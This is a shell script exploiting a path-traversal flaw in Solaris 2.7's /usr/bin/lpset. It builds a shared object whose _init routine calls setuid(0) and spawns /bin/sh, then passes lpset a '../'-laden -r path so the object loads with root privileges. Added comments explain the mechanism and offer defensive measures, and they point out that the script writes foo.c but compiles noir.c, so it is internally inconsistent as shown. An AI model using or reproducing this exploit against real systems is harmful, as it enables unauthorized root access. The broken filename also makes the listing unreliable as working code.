#!/bin/sh
#
# /usr/bin/lpset vulnerability in Solaris/SPARC 2.7
# script by noir@gsu.linux.org.tr
#
# lpset seems to use strcat to append the path given with -r,
# but there is a special case: /usr/lib/print/lib has to be present
#

# Analyst summary: this listing builds a shared object whose _init() routine
# calls setuid(0) and then system("/bin/sh"), and hands /usr/bin/lpset a
# "../"-laden path through -r. The runtime linker calls _init() when an object
# is loaded, so the routine runs with the privileges of whatever loads it.
# NOTE(review): presumably lpset is installed set-uid root and loads the object
# named by the -r path -- neither is shown here; confirm on the release in use.
#
# Defensive notes: apply the vendor's fix for lpset, or remove the set-uid bit
# from lpset where it is not needed. In process or audit logs, treat any lpset
# invocation whose -r argument contains ".." as suspicious.

# Write the C source for the shared object via a heredoc.
# NOTE(review): the heredoc creates foo.c, while the compile and cleanup
# steps below refer to noir.c.
cat > foo.c << EOF
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
	setuid(0);
	system("/bin/sh");
}
EOF

echo "Compiling ..."

# Compile noir.c to position-independent object code, then link it into the
# shared object noir.so (ld -G).
gcc -fPIC -c noir.c -g -DSOLARIS -Wall
ld -G -o noir.so noir.o -ldl

# Make the shared object readable and executable by every user.
chmod 755 noir.so

# Delete the intermediate files named noir.c and noir.o.
rm -f noir.c
rm -f noir.o

# Invoke lpset with -n xfn and an -r value that starts with "/../../../.."
# followed by the current directory ($PWD, expanded unquoted) and "noir".
# Per the file header, lpset appends this value to a path with strcat, so the
# ".." components presumably walk back out of /usr/lib/print/lib to the
# directory holding noir.so -- TODO confirm. The trailing "noir" is the
# positional argument passed to lpset.
/usr/bin/lpset -n xfn -r /../../../..$PWD/noir noir




